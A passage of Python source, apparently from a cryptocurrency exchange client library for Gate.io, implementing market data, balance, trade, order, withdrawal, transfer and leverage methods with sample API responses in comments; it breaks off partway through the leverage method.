def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
#
# request = {
# 'currency_pair': market['id'],
# 'interval': '0', # depth, 0 means no aggregation is applied, default to 0
# 'limit': limit, # maximum number of order depth data in asks or bids
# 'with_id': True, # return order book ID
# }
#
request = self.prepare_request(market)
spot = market['spot']
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetOrderBook',
# 'margin': 'publicMarginGetOrderBook',
'swap': 'publicFuturesGetSettleOrderBook',
'futures': 'publicDeliveryGetSettleOrderBook',
})
if limit is not None:
request['limit'] = limit # default 10, max 100
response = getattr(self, method)(self.extend(request, params))
#
# SPOT
#
# {
# "current": 1634345973275,
# "update": 1634345973271,
# "asks": [
# ["2.2241","12449.827"],
# ["2.2242","200"],
# ["2.2244","826.931"],
# ["2.2248","3876.107"],
# ["2.225","2377.252"],
# ["2.22509","439.484"],
# ["2.2251","1489.313"],
# ["2.2253","714.582"],
# ["2.2254","1349.784"],
# ["2.2256","234.701"]],
# "bids":[
# ["2.2236","32.465"],
# ["2.2232","243.983"],
# ["2.2231","32.207"],
# ["2.223","449.827"],
# ["2.2228","7.918"],
# ["2.2227","12703.482"],
# ["2.2226","143.033"],
# ["2.2225","143.027"],
# ["2.2224","1369.352"],
# ["2.2223","756.063"]
# ]
# }
#
# Perpetual Swap
#
# {
# "current": 1634350208.745,
# "asks": [
# {"s":24909,"p": "61264.8"},
# {"s":81,"p": "61266.6"},
# {"s":2000,"p": "61267.6"},
# {"s":490,"p": "61270.2"},
# {"s":12,"p": "61270.4"},
# {"s":11782,"p": "61273.2"},
# {"s":14666,"p": "61273.3"},
# {"s":22541,"p": "61273.4"},
# {"s":33,"p": "61273.6"},
# {"s":11980,"p": "61274.5"}
# ],
# "bids": [
# {"s":41844,"p": "61264.7"},
# {"s":13783,"p": "61263.3"},
# {"s":1143,"p": "61259.8"},
# {"s":81,"p": "61258.7"},
# {"s":2471,"p": "61257.8"},
# {"s":2471,"p": "61257.7"},
# {"s":2471,"p": "61256.5"},
# {"s":3,"p": "61254.2"},
# {"s":114,"p": "61252.4"},
# {"s":14372,"p": "61248.6"}
# ],
# "update": 1634350208.724
# }
#
timestamp = self.safe_integer(response, 'current')
if not spot:
timestamp = timestamp * 1000
priceKey = 0 if spot else 'p'
amountKey = 1 if spot else 's'
return self.parse_order_book(response, symbol, timestamp, 'bids', 'asks', priceKey, amountKey)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = self.prepare_request(market)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetTickers',
# 'margin': 'publicMarginGetTickers',
'swap': 'publicFuturesGetSettleTickers',
'futures': 'publicDeliveryGetSettleTickers',
})
response = getattr(self, method)(self.extend(request, params))
ticker = self.safe_value(response, 0)
return self.parse_ticker(ticker, market)
def parse_ticker(self, ticker, market=None):
#
# SPOT
#
# {
# "currency_pair": "KFC_USDT",
# "last": "7.255",
# "lowest_ask": "7.298",
# "highest_bid": "7.218",
# "change_percentage": "-1.18",
# "base_volume": "1219.053687865",
# "quote_volume": "8807.40299875455",
# "high_24h": "7.262",
# "low_24h": "7.095"
# }
#
# LINEAR/DELIVERY
#
# {
# "contract": "BTC_USDT",
# "last": "6432",
# "low_24h": "6278",
# "high_24h": "6790",
# "change_percentage": "4.43",
# "total_size": "32323904",
# "volume_24h": "184040233284",
# "volume_24h_btc": "28613220",
# "volume_24h_usd": "184040233284",
# "volume_24h_base": "28613220",
# "volume_24h_quote": "184040233284",
# "volume_24h_settle": "28613220",
# "mark_price": "6534",
# "funding_rate": "0.0001",
# "funding_rate_indicative": "0.0001",
# "index_price": "6531"
# }
#
marketId = self.safe_string_2(ticker, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
last = self.safe_number(ticker, 'last')
ask = self.safe_number(ticker, 'lowest_ask')
bid = self.safe_number(ticker, 'highest_bid')
high = self.safe_number(ticker, 'high_24h')
low = self.safe_number(ticker, 'low_24h')
baseVolume = self.safe_number(ticker, 'base_volume', 'volume_24h_base')
quoteVolume = self.safe_number(ticker, 'quote_volume', 'volume_24h_quote')
percentage = self.safe_number(ticker, 'change_percentage')
return self.safe_ticker({
'symbol': symbol,
'timestamp': None,
'datetime': None,
'high': high,
'low': low,
'bid': bid,
'bidVolume': None,
'ask': ask,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': percentage,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}, market)
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
defaultType = self.safe_string_2(self.options, 'fetchTickers', 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
method = self.get_supported_mapping(type, {
'spot': 'publicSpotGetTickers',
# 'margin': 'publicMarginGetTickers',
'swap': 'publicFuturesGetSettleTickers',
'futures': 'publicDeliveryGetSettleTickers',
})
request = {}
futures = type == 'futures'
swap = type == 'swap'
if (swap or futures) and not params['settle']:
request['settle'] = 'usdt' if swap else 'btc'
response = getattr(self, method)(self.extend(request, params))
return self.parse_tickers(response, symbols)
def fetch_balance(self, params={}):
# :param params.type: spot, margin, crossMargin, swap or future
# :param params.settle: Settle currency(usdt or btc) for perpetual swap and futures
self.load_markets()
defaultType = self.safe_string_2(self.options, 'fetchBalance', 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
swap = type == 'swap'
futures = type == 'futures'
method = self.get_supported_mapping(type, {
'spot': 'privateSpotGetAccounts',
# 'margin': 'publicMarginGetTickers',
'swap': 'privateFuturesGetSettleAccounts',
'futures': 'privateDeliveryGetSettleAccounts',
})
request = {}
response = []
if swap or futures:
defaultSettle = 'usdt' if swap else 'btc'
request['settle'] = self.safe_string(params, 'settle', defaultSettle)
response_item = getattr(self, method)(self.extend(request, params))
response = [response_item]
else:
response = getattr(self, method)(self.extend(request, params))
# SPOT
# [
# {
# "currency": "DBC",
# "available": "0",
# "locked": "0"
# },
# ...
# ]
#
# Perpetual Swap
# {
# order_margin: "0",
# point: "0",
# bonus: "0",
# history: {
# dnw: "2.1321",
# pnl: "11.5351",
# refr: "0",
# point_fee: "0",
# fund: "-0.32340576684",
# bonus_dnw: "0",
# point_refr: "0",
# bonus_offset: "0",
# fee: "-0.20132775",
# point_dnw: "0",
# },
# unrealised_pnl: "13.315100000006",
# total: "12.51345151332",
# available: "0",
# in_dual_mode: False,
# currency: "USDT",
# position_margin: "12.51345151332",
# user: "6333333",
# }
#
# Delivery Future
# {
# order_margin: "0",
# point: "0",
# history: {
# dnw: "1",
# pnl: "0",
# refr: "0",
# point_fee: "0",
# point_dnw: "0",
# settle: "0",
# settle_fee: "0",
# point_refr: "0",
# fee: "0",
# },
# unrealised_pnl: "0",
# total: "1",
# available: "1",
# currency: "USDT",
# position_margin: "0",
# user: "6333333",
# }
result = {}
for i in range(0, len(response)):
entry = response[i]
account = self.account()
currencyId = self.safe_string(entry, 'currency')
code = self.safe_currency_code(currencyId)
account['used'] = self.safe_string_2(entry, 'locked', 'position_margin')
account['free'] = self.safe_string(entry, 'available')
result[code] = account
return self.parse_balance(result)
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
price = self.safe_string(params, 'price')
request = self.prepare_request(market)
request['interval'] = self.timeframes[timeframe]
method = 'publicSpotGetCandlesticks'
if market['contract']:
if market['futures']:
method = 'publicDeliveryGetSettleCandlesticks'
elif market['swap']:
method = 'publicFuturesGetSettleCandlesticks'
isMark = (price == 'mark')
isIndex = (price == 'index')
if isMark or isIndex:
request['contract'] = price + '_' + market['id']
params = self.omit(params, 'price')
if since is None:
if limit is not None:
request['limit'] = limit
else:
request['from'] = int(since / 1000)
if limit is not None:
request['to'] = self.sum(request['from'], limit * self.parse_timeframe(timeframe) - 1)
response = getattr(self, method)(self.extend(request, params))
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
request = {
'price': 'mark',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def fetch_funding_rate_history(self, symbol=None, limit=None, since=None, params={}):
self.load_markets()
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchFundingRateHistory() requires a symbol argument')
market = self.market(symbol)
request = {
'contract': market['id'],
'settle': market['quote'].lower(),
}
if limit is not None:
request['limit'] = limit
method = 'publicFuturesGetSettleFundingRate'
response = getattr(self, method)(self.extend(request, params))
#
# {
# "r": "0.00063521",
# "t": "1621267200000",
# }
#
rates = []
for i in range(0, len(response)):
entry = response[i]
timestamp = self.safe_timestamp(entry, 't')
rates.append({
'info': entry,
'symbol': symbol,
'fundingRate': self.safe_number(entry, 'r'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
return self.sort_by(rates, 'timestamp')
def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
request = {
'price': 'index',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def parse_ohlcv(self, ohlcv, market=None):
#
# Spot market candles
#
# [
# "1626163200", # Unix timestamp in seconds
# "346711.933138181617", # Trading volume
# "33165.23", # Close price
# "33260", # Highest price
# "33117.6", # Lowest price
# "33184.47" # Open price
# ]
#
# Mark and Index price candles
#
# {
# "t":1632873600, # Unix timestamp in seconds
# "o": "41025", # Open price
# "h": "41882.17", # Highest price
# "c": "41776.92", # Close price
# "l": "40783.94" # Lowest price
# }
#
if isinstance(ohlcv, list):
return [
self.safe_timestamp(ohlcv, 0), # unix timestamp in seconds
self.safe_number(ohlcv, 5), # open price
self.safe_number(ohlcv, 3), # highest price
self.safe_number(ohlcv, 4), # lowest price
self.safe_number(ohlcv, 2), # close price
self.safe_number(ohlcv, 1), # trading volume
]
else:
# Mark and Index price candles
return [
self.safe_timestamp(ohlcv, 't'), # unix timestamp in seconds
self.safe_number(ohlcv, 'o'), # open price
self.safe_number(ohlcv, 'h'), # highest price
self.safe_number(ohlcv, 'l'), # lowest price
self.safe_number(ohlcv, 'c'), # close price
self.safe_number(ohlcv, 'v'), # trading volume, None for mark or index price
]
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
#
# spot
#
# request = {
# 'currency_pair': market['id'],
# 'limit': limit, # maximum number of records to be returned in a single list
# 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results
# 'reverse': False, # True to retrieve records where id is smaller than the specified last_id, False to retrieve records where id is larger than the specified last_id
# }
#
# swap, futures
#
# request = {
# 'settle': market['settleId'],
# 'contract': market['id'],
# 'limit': limit, # maximum number of records to be returned in a single list
# 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results
# 'from': since / 1000), # starting time in seconds, if not specified, to and limit will be used to limit response items
# 'to': self.seconds(), # end time in seconds, default to current time
# }
#
request = self.prepare_request(market)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetTrades',
# 'margin': 'publicMarginGetTickers',
'swap': 'publicFuturesGetSettleTrades',
'futures': 'publicDeliveryGetSettleTrades',
})
if limit is not None:
request['limit'] = limit # default 100, max 1000
if since is not None and (market['contract']):
request['from'] = int(since / 1000)
response = getattr(self, method)(self.extend(request, params))
#
# spot
#
# [
# {
# id: "1852958144",
# create_time: "1634673259",
# create_time_ms: "1634673259378.105000",
# currency_pair: "ADA_USDT",
# side: "sell",
# amount: "307.078",
# price: "2.104",
# }
# ]
#
# perpetual swap
#
# [
# {
# size: "2",
# id: "2522911",
# create_time_ms: "1634673380.182",
# create_time: "1634673380.182",
# contract: "ADA_USDT",
# price: "2.10486",
# }
# ]
#
return self.parse_trades(response, market, since, limit)
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
#
# request = {
# 'currency_pair': market['id'],
# # 'limit': limit,
# # 'page': 0,
# # 'order_id': 'Order ID',
# # 'account': 'spot', # default to spot and margin account if not specified, set to cross_margin to operate against margin account
# # 'from': since, # default to 7 days before current time
# # 'to': self.milliseconds(), # default to current time
# }
#
request = self.prepare_request(market)
if limit is not None:
request['limit'] = limit # default 100, max 1000
if since is not None:
request['from'] = int(since / 1000)
# request['to'] = since + 7 * 24 * 60 * 60
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotGetMyTrades',
# 'margin': 'publicMarginGetCurrencyPairs',
'swap': 'privateFuturesGetSettleMyTrades',
'futures': 'privateDeliveryGetSettleMyTrades',
})
response = getattr(self, method)(self.extend(request, params))
# SPOT
# [{
# id: "1851927191",
# create_time: "1634333360",
# create_time_ms: "1634333360359.901000",
# currency_pair: "BTC_USDT",
# side: "buy",
# role: "taker",
# amount: "0.0001",
# price: "62547.51",
# order_id: "93475897349",
# fee: "2e-07",
# fee_currency: "BTC",
# point_fee: "0",
# gt_fee: "0",
# }]
# Perpetual Swap
# [{
# size: "-13",
# order_id: "79723658958",
# id: "47612669",
# role: "taker",
# create_time: "1634600263.326",
# contract: "BTC_USDT",
# price: "61987.8",
# }]
return self.parse_trades(response, market, since, limit)
def parse_trade(self, trade, market=None):
#
# public
#
# {
# "id": "1334253759",
# "create_time": "1626342738",
# "create_time_ms": "1626342738331.497000",
# "currency_pair": "BTC_USDT",
# "side": "sell",
# "amount": "0.0022",
# "price": "32452.16"
# }
#
# private
#
# {
# "id": "218087755",
# "create_time": "1578958740",
# "create_time_ms": "1578958740122.710000",
# "currency_pair": "BTC_USDT",
# "side": "sell",
# "role": "taker",
# "amount": "0.0004",
# "price": "8112.77",
# "order_id": "8445563839",
# "fee": "0.006490216",
# "fee_currency": "USDT",
# "point_fee": "0",
# "gt_fee": "0"
# }
#
id = self.safe_string(trade, 'id')
timestampStringContract = self.safe_string(trade, 'create_time')
timestampString = self.safe_string_2(trade, 'create_time_ms', 'time', timestampStringContract)
timestamp = None
if timestampString.find('.') > 0:
milliseconds = timestampString.split('.')
timestamp = int(milliseconds[0])
if market['contract']:
timestamp = timestamp * 1000
marketId = self.safe_string_2(trade, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
amountString = self.safe_string_2(trade, 'amount', 'size')
priceString = self.safe_string(trade, 'price')
costString = Precise.string_abs(Precise.string_mul(amountString, priceString))
price = self.parse_number(priceString)
cost = self.parse_number(costString)
contractSide = 'sell' if Precise.string_lt(amountString, '0') else 'buy'
amountString = Precise.string_abs(amountString)
amount = self.parse_number(amountString)
side = self.safe_string(trade, 'side', contractSide)
orderId = self.safe_string(trade, 'order_id')
gtFee = self.safe_string(trade, 'gt_fee')
feeCurrency = None
feeCost = None
if gtFee == '0':
feeCurrency = self.safe_string(trade, 'fee_currency')
feeCost = self.safe_number(trade, 'fee')
else:
feeCurrency = 'GT'
feeCost = self.parse_number(gtFee)
fee = {
'cost': feeCost,
'currency': feeCurrency,
}
takerOrMaker = self.safe_string(trade, 'role')
return {
'info': trade,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': orderId,
'type': None,
'side': side,
'takerOrMaker': takerOrMaker,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit
if since is not None:
request['from'] = int(since / 1000)
request['to'] = since + 30 * 24 * 60 * 60
response = self.privateWalletGetDeposits(self.extend(request, params))
return self.parse_transactions(response, currency)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit
if since is not None:
request['from'] = int(since / 1000)
request['to'] = since + 30 * 24 * 60 * 60
response = self.privateWalletGetWithdrawals(self.extend(request, params))
return self.parse_transactions(response, currency)
def withdraw(self, code, amount, address, tag=None, params={}):
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
'address': address,
'amount': self.currency_to_precision(code, amount),
}
if tag is not None:
request['memo'] = tag
networks = self.safe_value(self.options, 'networks', {})
network = self.safe_string_upper(params, 'network') # self line allows the user to specify either ERC20 or ETH
network = self.safe_string_lower(networks, network, network) # handle ETH>ERC20 alias
if network is not None:
request['chain'] = network
params = self.omit(params, 'network')
response = self.privateWithdrawalsPost(self.extend(request, params))
#
# {
# "id": "w13389675",
# "currency": "USDT",
# "amount": "50",
# "address": "TUu2rLFrmzUodiWfYki7QCNtv1akL682p1",
# "memo": null
# }
#
currencyId = self.safe_string(response, 'currency')
id = self.safe_string(response, 'id')
return {
'info': response,
'id': id,
'code': self.safe_currency_code(currencyId),
'amount': self.safe_number(response, 'amount'),
'address': self.safe_string(response, 'address'),
'tag': self.safe_string(response, 'memo'),
}
def parse_transaction_status(self, status):
statuses = {
'PEND': 'pending',
'REQUEST': 'pending',
'DMOVE': 'pending',
'CANCEL': 'failed',
'DONE': 'ok',
}
return self.safe_string(statuses, status, status)
def parse_transaction_type(self, type):
types = {
'd': 'deposit',
'w': 'withdrawal',
}
return self.safe_string(types, type, type)
def parse_transaction(self, transaction, currency=None):
#
# deposits
#
# {
# "id": "d33361395",
# "currency": "USDT_TRX",
# "address": "TErdnxenuLtXfnMafLbfappYdHtnXQ5U4z",
# "amount": "100",
# "txid": "ae9374de34e558562fe18cbb1bf9ab4d9eb8aa7669d65541c9fa2a532c1474a0",
# "timestamp": "1626345819",
# "status": "DONE",
# "memo": ""
# }
#
# withdrawals
id = self.safe_string(transaction, 'id')
type = None
if id is not None:
type = self.parse_transaction_type(id[0])
currencyId = self.safe_string(transaction, 'currency')
code = self.safe_currency_code(currencyId)
amount = self.safe_number(transaction, 'amount')
txid = self.safe_string(transaction, 'txid')
rawStatus = self.safe_string(transaction, 'status')
status = self.parse_transaction_status(rawStatus)
address = self.safe_string(transaction, 'address')
fee = self.safe_number(transaction, 'fee')
tag = self.safe_string(transaction, 'memo')
if tag == '':
tag = None
timestamp = self.safe_timestamp(transaction, 'timestamp')
return {
'info': transaction,
'id': id,
'txid': txid,
'currency': code,
'amount': amount,
'address': address,
'tag': tag,
'status': status,
'type': type,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': fee,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
#
# :param(str) symbol: base/quote currency pair
# :param(str) type: Order type(limit, market, ...)
# :param(str) side: buy or sell
# :param(number) amount: Amount of base currency ordered
# :param(number) price: Price of the base currency using quote currency
# :param(dict) params:
# - type: market type(spot, futures, ...)
# - reduceOnly
self.load_markets()
market = self.market(symbol)
defaultType = self.safe_string_2(self.options, 'createOrder', 'defaultType', 'spot')
marketType = self.safe_string(params, 'type', defaultType)
contract = market['contract']
request = self.prepare_request(market)
reduceOnly = self.safe_value(params, 'reduceOnly')
params = self.omit(params, 'reduceOnly')
if reduceOnly is not None:
if not contract:
raise InvalidOrder(self.id + ' createOrder() does not support reduceOnly for ' + marketType + ' orders, reduceOnly orders are supported for futures and perpetuals only')
request['reduce_only'] = reduceOnly
if contract:
if side == 'sell':
amount = 0 - amount
request['size'] = self.parse_number(self.amount_to_precision(symbol, amount))
else:
request['side'] = side
request['type'] = type
request['amount'] = self.amount_to_precision(symbol, amount)
request['account'] = marketType
# if margin:
# if entering trade:
# request['auto_borrow'] = True
# elif exiting trade:
# request['auto_repay'] = True
# }
# }
if type == 'limit':
if not price:
raise ArgumentsRequired('Argument price is required for ' + self.id + '.createOrder for limit orders')
request['price'] = self.price_to_precision(symbol, price)
elif (type == 'market') and contract:
request['tif'] = 'ioc'
request['price'] = 0
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotPostOrders',
# 'margin': 'privateSpotPostOrders',
'swap': 'privateFuturesPostSettleOrders',
'future': 'privateDeliveryPostSettleOrders',
})
response = getattr(self, method)(self.extend(request, params))
return self.parse_order(response, market)
def parse_order_status(self, status):
statuses = {
'filled': 'closed',
'cancelled': 'canceled',
'liquidated': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder, spot
#
# {
# "id": "62364648575",
# "text": "apiv4",
# "create_time": "1626354834",
# "update_time": "1626354834",
# "create_time_ms": "1626354833544",
# "update_time_ms": "1626354833544",
# "status": "open",
# "currency_pair": "BTC_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "0.0001",
# "price": "30000",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.0001",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "BTC",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": True,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# }
#
#
id = self.safe_string(order, 'id')
marketId = self.safe_string_2(order, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
timestamp = self.safe_timestamp(order, 'create_time')
timestamp = self.safe_integer(order, 'create_time_ms', timestamp)
lastTradeTimestamp = self.safe_timestamp(order, 'update_time')
lastTradeTimestamp = self.safe_integer(order, 'update_time_ms', lastTradeTimestamp)
amountRaw = self.safe_string_2(order, 'amount', 'size')
amount = Precise.string_abs(amountRaw)
price = self.safe_string(order, 'price')
average = self.safe_string(order, 'fill_price')
remaining = self.safe_string(order, 'left')
cost = self.safe_string(order, 'filled_total') # same as filled_price
rawStatus = None
side = None
contract = self.safe_value(market, 'contract')
if contract:
side = 'buy' if Precise.string_gt(amountRaw, '0') else 'sell'
rawStatus = self.safe_string(order, 'finish_as', 'open')
else:
# open, closed, cancelled - almost already ccxt unified!
rawStatus = self.safe_string(order, 'status')
side = self.safe_string(order, 'side')
status = self.parse_order_status(rawStatus)
type = self.safe_string(order, 'type')
timeInForce = self.safe_string_upper_2(order, 'time_in_force', 'tif')
fees = []
gtFee = self.safe_number(order, 'gt_fee')
if gtFee:
fees.append({
'currency': 'GT',
'cost': gtFee,
})
fee = self.safe_number(order, 'fee')
if fee:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'fee_currency')),
'cost': fee,
})
rebate = self.safe_string(order, 'rebated_fee')
if rebate:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'rebated_fee_currency')),
'cost': self.parse_number(Precise.string_neg(rebate)),
})
mkfr = self.safe_number(order, 'mkfr')
tkfr = self.safe_number(order, 'tkfr')
if mkfr:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'settleId')),
'cost': mkfr,
})
if tkfr:
fees.append({
'currency': self.safe_currency_code(self.safe_string(market, 'settleId')),
'cost': tkfr,
})
return self.safe_order2({
'id': id,
'clientOrderId': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'status': status,
'symbol': symbol,
'type': type,
'timeInForce': timeInForce,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'average': average,
'amount': amount,
'cost': cost,
'filled': None,
'remaining': remaining,
'fee': None,
'fees': fees,
'trades': None,
'info': order,
}, market)
def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'order_id': id,
}
if market['spot'] or market['margin']:
request['currency_pair'] = market['id']
else:
request['settle'] = market['settleId']
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotGetOrdersOrderId',
# 'margin': 'publicMarginGetTickers',
'swap': 'privateFuturesGetSettleOrdersOrderId',
'futures': 'privateDeliveryGetSettlePriceOrdersOrderId',
})
response = getattr(self, method)(self.extend(request, params))
return self.parse_order(response, market)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
if symbol is None and (type == 'spot') or type == 'margin' or type == 'cross_margin':
request = {
# 'page': 1,
# 'limit': limit,
'account': type, # spot/margin(default), cross_margin
}
if limit is not None:
request['limit'] = limit
response = self.privateSpotGetOpenOrders(self.extend(request, params))
#
# [
# {
# "currency_pair": "ETH_BTC",
# "total": 1,
# "orders": [
# {
# "id": "12332324",
# "text": "t-123456",
# "create_time": "1548000000",
# "update_time": "1548000100",
# "currency_pair": "ETH_BTC",
# "status": "open",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "1",
# "price": "5.00032",
# "time_in_force": "gtc",
# "left": "0.5",
# "filled_total": "2.50016",
# "fee": "0.005",
# "fee_currency": "ETH",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee": "0",
# "rebated_fee_currency": "BTC"
# }
# ]
# },
# ...
# ]
#
allOrders = []
for i in range(0, len(response)):
entry = response[i]
orders = self.safe_value(entry, 'orders', [])
parsed = self.parse_orders(orders, None, since, limit)
allOrders = self.array_concat(allOrders, parsed)
return self.filter_by_since_limit(allOrders, since, limit)
return self.fetch_orders_by_status('open', symbol, since, limit, params)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_by_status('finished', symbol, since, limit, params)
def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}):
self.load_markets()
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrdersByStatus requires a symbol argument')
market = self.market(symbol)
request = self.prepare_request(market)
request['status'] = status
if limit is not None:
request['limit'] = limit
if since is not None and (market['spot'] or market['margin']):
request['start'] = int(since / 1000)
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotGetOrders',
'margin': 'privateSpotGetOrders',
'swap': 'privateFuturesGetSettleOrders',
'futures': 'privateDeliveryGetSettleOrders',
})
if market['type'] == 'margin' or market['type'] == 'cross_margin':
request['account'] = market['type']
response = getattr(self, method)(self.extend(request, params))
# SPOT
# {
# "id":"8834234273",
# "text": "3",
# "create_time": "1635406193",
# "update_time": "1635406193",
# "create_time_ms": 1635406193361,
# "update_time_ms": 1635406193361,
# "status": "closed",
# "currency_pair": "BTC_USDT",
# "type": "limit",
# "account": "spot",
# "side": "sell",
# "amount": "0.0002",
# "price": "58904.01",
# "time_in_force":"gtc",
# "iceberg": "0",
# "left": "0.0000",
# "fill_price": "11.790516",
# "filled_total": "11.790516",
# "fee": "0.023581032",
# "fee_currency": "USDT",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee_currency": "BTC"
# }
# Perpetual Swap
# {
# "status": "finished",
# "size":-1,
# "left":0,
# "id":82750739203,
# "is_liq":false,
# "is_close":false,
# "contract": "BTC_USDT",
# "text": "web",
# "fill_price": "60721.3",
# "finish_as": "filled",
# "iceberg":0,
# "tif": "ioc",
# "is_reduce_only":true,
# "create_time": 1635403475.412,
# "finish_time": 1635403475.4127,
# "price": "0"
# }
return self.parse_orders(response, market, since, limit)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrders requires a symbol parameter')
market = self.market(symbol)
request = {
'order_id': id,
}
if market['contract']:
request['settle'] = market['settleId']
else:
request['currency_pair'] = market['id']
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotDeleteOrdersOrderId',
'margin': 'privateSpotDeleteOrdersOrderId',
'swap': 'privateFuturesDeleteSettleOrdersOrderId',
'futures': 'privateDeliveryDeleteSettleOrdersOrderId',
})
response = getattr(self, method)(self.extend(request, params))
# Perpetual swap
# {
# id: "82241928192",
# contract: "BTC_USDT",
# mkfr: "0",
# tkfr: "0.0005",
# tif: "gtc",
# is_reduce_only: False,
# create_time: "1635196145.06",
# finish_time: "1635196233.396",
# price: "61000",
# size: "4",
# refr: "0",
# left: "4",
# text: "web",
# fill_price: "0",
# user: "6693577",
# finish_as: "cancelled",
# status: "finished",
# is_liq: False,
# refu: "0",
# is_close: False,
# iceberg: "0",
# }
return self.parse_order(response, market)
def transfer(self, code, amount, fromAccount, toAccount, params={}):
self.load_markets()
currency = self.currency(code)
accountsByType = self.safe_value(self.options, 'accountsByType', {})
fromId = self.safe_string(accountsByType, fromAccount, fromAccount)
toId = self.safe_string(accountsByType, toAccount, toAccount)
if fromId is None:
keys = list(accountsByType.keys())
raise ExchangeError(self.id + ' fromAccount must be one of ' + ', '.join(keys))
if toId is None:
keys = list(accountsByType.keys())
raise ExchangeError(self.id + ' toAccount must be one of ' + ', '.join(keys))
truncated = self.currency_to_precision(code, amount)
request = {
'currency': currency['id'],
'from': fromId,
'to': toId,
'amount': truncated,
}
if (toId == 'futures') or (toId == 'delivery'):
request['settle'] = currency['id']
response = self.privateWalletPostTransfers(self.extend(request, params))
#
# according to the docs
#
# {
# "currency": "BTC",
# "from": "spot",
# "to": "margin",
# "amount": "1",
# "currency_pair": "BTC_USDT"
# }
#
# actual response
#
# POST https://api.gateio.ws/api/v4/wallet/transfers 204 No Content
#
return {
'info': response,
'from': fromId,
'to': toId,
'amount': truncated,
'code': code,
}
def set_leverage(self, leverage, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument')
# WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS
# AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS
if (leverage < 0) or (leverage > 100):
raise BadRequest(self.id + ' leverage should be between 1 and 100')
self.load_markets()
market = self.market(symbol)
method = self.get_supported_mapping(market['type'], {
'swap': 'privateFuturesPostSettlePositionsContractLeverage',
'futures': 'privateDeliveryPostSettlePositionsContractLeverage',
})
request = self.prepare_request(market)
request['query'] = {
'leverage': str(leverage),
}
